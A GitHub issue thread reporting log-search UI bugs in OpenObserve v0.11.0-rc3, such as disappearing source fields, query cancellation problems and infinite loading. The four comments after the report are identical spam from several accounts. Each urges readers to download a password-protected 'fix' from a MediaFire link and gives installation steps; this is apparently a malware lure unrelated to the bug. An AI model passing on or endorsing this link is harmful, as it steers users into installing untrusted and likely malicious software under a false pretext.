### ISSUE TITLE
Logs related issues 

### ISSUE THREAD

**Issue by neha00290** [openobserve/openobserve#4344]
### Which OpenObserve functionalities are the source of the bug?

log search

### Is this a regression?

Yes

### Description

- [x] Source appears in wrap by default
- [x] On switching from saved views source disppears
- [x] On reset, orderby timestamp appears in sql mode.
- [x] loading text appears white in dark mode
- [x] Histogram should partially load when user cancels query mid way if histogram has partially loaded but sometimes it displayed error message.
- [ ] Sometimes user has to click cancel query multiple times for the query to get cancelled
- [ ] 7) The data on logs UI does not load and displays infinite loading when user searches longer duration

### Please provide a link to a minimal reproduction of the bug
 issue - 7  <img width="1196" alt="Screenshot 2024-08-27 at 2 44 47 PM" src="https://github.com/user-attachments/assets/2ae50f0a-c594-4716-aff3-3295063593d0">

_No response_

### Please provide the version you discovered this bug in (check about page for version information)

```true
Version
Commit Hash
Build Date
v0.11.0-rc3
907455777fb9b06f968835f7864ce6790c63f276
2024-08-27T05:37:22Z
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
